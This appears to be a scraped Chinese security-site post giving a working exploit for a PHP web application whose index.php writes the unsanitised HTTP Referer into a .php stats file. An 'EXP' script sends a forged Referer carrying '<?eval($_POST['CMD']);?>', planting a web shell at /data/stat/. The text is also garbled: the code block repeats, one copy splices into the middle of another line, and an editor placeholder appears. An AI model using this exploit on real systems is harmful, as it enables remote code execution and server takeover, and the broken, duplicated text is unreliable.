|
index.php line 10
- $data_name=get_date();
-
- ... ...
-
- $from=$_SERVER["HTTP_REFERER"];
-
- ... ...
-
- if(file_exists("$sys_data_dir/stat/$data_name.php"))
- {
- $stat_data=file("$sys_data_dir/stat/$data_name.php");
- for($a=0;$a<count($stat_data);$a++)
- {
- $stat_info=explode("|",$stat_data[$a]);
- if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)
- {
- break;
- }
- if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)
- {
- $tod_data=readfrom("$sys_data_dir/stat/$data_name.php");
- $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;
- writeto("$sys_data_dir/stat/$data_name.php",$new_data);
- break;
- }
$data_name=get_date();
... ...
$from=index.php line 10
- $data_name=get_date();
-
- ... ...
-
- $from=$_SERVER["HTTP_REFERER"];
-
- ... ...
-
- if(file_exists("$sys_data_dir/stat/$data_name.php"))
- {
- $stat_data=file("$sys_data_dir/stat/$data_name.php");
- for($a=0;$a<count($stat_data);$a++)
- {
- $stat_info=explode("|",$stat_data[$a]);
- if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)
- {
- break;
- }
- if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)
- {
- $tod_data=readfrom("$sys_data_dir/stat/$data_name.php");
- $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;
- writeto("$sys_data_dir/stat/$data_name.php",$new_data);
- break;
- }
___FCKpd___0
------------------------------------------------------------------------------------
伪造http_referer 写入得shell /data/stat/年-月-日.php
------------------------------------------------------------------------------------
EXP:
- <?
- $server = '';
- $host = '';
- $target = '/index.php';
- $referer = '<?eval($_POST['CMD']);?>';
- $port = 80;
- $fp = fsockopen($server, $port, $errno, $errstr, 30);
- if (!$fp)
- {
- echo "$errstr ($errno)<br />\n";
- }
- else
- {
- $out = "GET $target HTTP/1.1\r\n";
- $out .= "Host: $host\r\n";
- $out .= "Cookie: ASPSESSIONIDSQTBQSDA=DFCAPKLBBFICDAFMHNKIGKEG\r\n";
- $out .= "Referer: $referer\r\n";
- $out .= "Connection: Close\r\n\r\n";
- fwrite($fp, $out);
- while (!feof($fp))
- {
- echo fgets($fp, 128);
- }
- fclose($fp);
- }
- ?>
SERVER["HTTP_REFERER"];
... ...
if(file_exists("$sys_data_dir/stat/$data_name.php"))
{
$stat_data=file("$sys_data_dir/stat/$data_name.php");
for($a=0;$a<count($stat_data);$a++)
{
$stat_info=explode("|",$stat_data[$a]);
if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)//如果此IP已经访问且访问时间小于访问记录时间,退出循环
{
break;
}
if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)//如果此IP已经访问但访问时间大于访问记录时间,进行写入操作
{
$tod_data=readfrom("$sys_data_dir/stat/$data_name.php");
$new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;
writeto("$sys_data_dir/stat/$data_name.php",$new_data);
break;
}
------------------------------------------------------------------------------------
伪造http_referer 写入得shell /data/stat/年-月-日.php
------------------------------------------------------------------------------------
EXP:
- <?
- $server = '';
- $host = '';
- $target = '/index.php';
- $referer = '<?eval($_POST['CMD']);?>';
- $port = 80;
- $fp = fsockopen($server, $port, $errno, $errstr, 30);
- if (!$fp)
- {
- echo "$errstr ($errno)<br />\n";
- }
- else
- {
- $out = "GET $target HTTP/1.1\r\n";
- $out .= "Host: $host\r\n";
- $out .= "Cookie: ASPSESSIONIDSQTBQSDA=DFCAPKLBBFICDAFMHNKIGKEG\r\n";
- $out .= "Referer: $referer\r\n";
- $out .= "Connection: Close\r\n\r\n";
- fwrite($fp, $out);
- while (!feof($fp))
- {
- echo fgets($fp, 128);
- }
- fclose($fp);
- }
- ?>
|
推荐
评论(0条)
